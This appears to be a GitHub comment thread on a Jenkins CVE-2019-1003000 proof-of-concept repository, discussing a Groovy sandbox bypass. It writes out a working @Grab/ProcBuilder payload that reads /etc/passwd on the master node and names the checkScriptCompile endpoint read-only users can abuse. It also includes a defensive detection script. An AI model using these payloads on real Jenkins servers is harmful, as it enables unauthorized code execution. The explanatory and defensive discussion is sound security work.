Comments (5)
Sigh... it's still not a security problem... You used Jenkins the way it was meant to be used... you logged in and performed an action within the limits the system allows, no trickery to achieve "RCE"... it's not an exploit. It's a script on how to add a command to a job.
from cve-2019-1003000-jenkins-rce-poc.
@pbuckley4192 can you provide a proof of concept where a logged-in user with the ability to 'perform an action within the limits the system allows' can execute shell inside the master node?
Indeed, a user with Administrator rights or Overall/RunScripts permission can use /script to execute shell via Groovy script, directly on the master node. But suppose that a user only has access to a certain job inside a distributed Jenkins. That job will execute some build scripts inside the slave node.
Usually, we can add a Groovy script to execute a shell command inside the slave node. Example:

```groovy
node {
    sh "cat /etc/passwd"
}
```
That is the intended way of Jenkins, the one that was meant to be used, because it's a feature. But that user can't perform shell execution inside the master node. That's why the "vulnerability" described in https://cxsecurity.com/issue/WLB-2019020120 is indeed misleading and actually a feature (not a security vulnerability). But the one in this repository is actually a vulnerability.
For example, we can use this script to execute shell with Groovy:

```groovy
def sout = new StringBuilder(), serr = new StringBuilder()
def proc = 'cat /etc/passwd'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
```
But it will be rejected when you try to build because of sandbox/scriptsecurity.
When you use this Groovy script:

```groovy
import org.buildobjects.process.ProcBuilder
@Grab('org.buildobjects:jproc:2.2.3')
class Dummy{ }
print new ProcBuilder("/bin/bash").withArgs("-c","cat /etc/passwd").run().getOutputString()
```
It will be executed, and that's not the intended usability. It's because the unpatched Jenkins allows @Grab, which is an AST annotation to load an external module (http://groovy-lang.org/metaprogramming.html). The patched Jenkins now disallows @Grab.
The security implication of this is that a user with limited access (who can only execute shell inside the slave node) can use this vulnerability to execute shell inside the master node. Imagine a big organization with hundreds of engineers. Only one has access to execute shell on the master node and the rest only have access to execute shell on slave nodes for certain projects. This is indeed a security vulnerability.
The other scenario of this vulnerability (besides the one that is in this repository): a user with very limited permission (only Overall/Read, cannot configure or run a job) can use this URL to execute a sandboxed Groovy script:

https://URL/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=[script]

With the same vulnerability (but a different way of exploiting it), we can bypass the sandbox, and a user with Overall/Read permission can execute shell inside the master node.
Do you want the RCE without authentication at all? Combine with http://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html.
CMIIW
from cve-2019-1003000-jenkins-rce-poc.
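A defender-side check added here (not code from the PoC repository or from any commenter): it flags the Groovy Grape annotations that the comment above says the patched Jenkins disallows in pipeline scripts, and flags requests to the checkScriptCompile endpoint it names in a web-server access log. The pipeline script and log lines below are constructed samples.

```python
import re
from typing import List, Tuple

# Groovy Grape annotations; @Grab is the one the thread shows bypassing the sandbox.
# Longer names are listed first so that "@GrabConfig" is not reported as "@Grab".
GRAPE_ANNOTATIONS = ("GrabConfig", "GrabResolver", "GrabExclude", "Grapes", "Grab")
GRAPE_RE = re.compile(r"@(" + "|".join(GRAPE_ANNOTATIONS) + r")\b")

# The form-validation endpoint from the thread that compiles user-supplied Groovy.
CHECK_COMPILE_RE = re.compile(r"descriptorByName/[^\s?\"]+/checkScriptCompile")


def find_grape_annotations(script: str) -> List[Tuple[int, str]]:
    """Return (line_number, annotation) for every Grape annotation in a pipeline script."""
    hits = []
    for lineno, line in enumerate(script.splitlines(), start=1):
        for match in GRAPE_RE.finditer(line):
            hits.append((lineno, match.group(1)))
    return hits


def find_check_compile_requests(access_log: str) -> List[str]:
    """Return the access-log lines that hit a checkScriptCompile endpoint."""
    return [line for line in access_log.splitlines() if CHECK_COMPILE_RE.search(line)]


# Constructed sample pipeline script: a Grape annotation ahead of an ordinary build step.
SAMPLE_SCRIPT = """\
@Grab('org.example:something:1.0')
class Dummy { }
node {
  sh "make"
}
"""

# Constructed sample access log (Combined Log Format); IPs and timestamps are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Feb/2019:10:00:01 +0000] "GET /job/demo/ HTTP/1.1" 200 512
10.0.0.7 - - [01/Feb/2019:10:00:02 +0000] "GET /descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=x HTTP/1.1" 200 80
"""

if __name__ == "__main__":
    for lineno, name in find_grape_annotations(SAMPLE_SCRIPT):
        print(f"pipeline script line {lineno}: @{name} annotation present")
    for line in find_check_compile_requests(SAMPLE_LOG):
        print("checkScriptCompile request:", line)
```

Pipeline scripts with Grape annotations, and checkScriptCompile hits from accounts that hold only Overall/Read, are the two signals a Jenkins owner would want to review alongside patch level.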
Hi @pbuckley4192, as specified in README.md, you need Job/Configure permission for this exploit to work.
This exploit allows a user (more specifically, a regular non-administrative user) to bypass the sandbox protection and execute arbitrary code on the Jenkins server, which is not the intended usage of Jenkins.
from cve-2019-1003000-jenkins-rce-poc.
You may also want to check out an article regarding the full exploit chain authored by the CVE reporter. I think they will publish it next week.
The exploit chain may allow you to do RCE without the need of Job/Configure permission.
from cve-2019-1003000-jenkins-rce-poc.
@farisv Great writeup!! @adamyordan please put @farisv's comment in the readme as an explanation!
Confirmed it with my production Jenkins (Jenkins with ~100 users); a read-only user was able to obtain a shell using that @Grab.
from cve-2019-1003000-jenkins-rce-poc.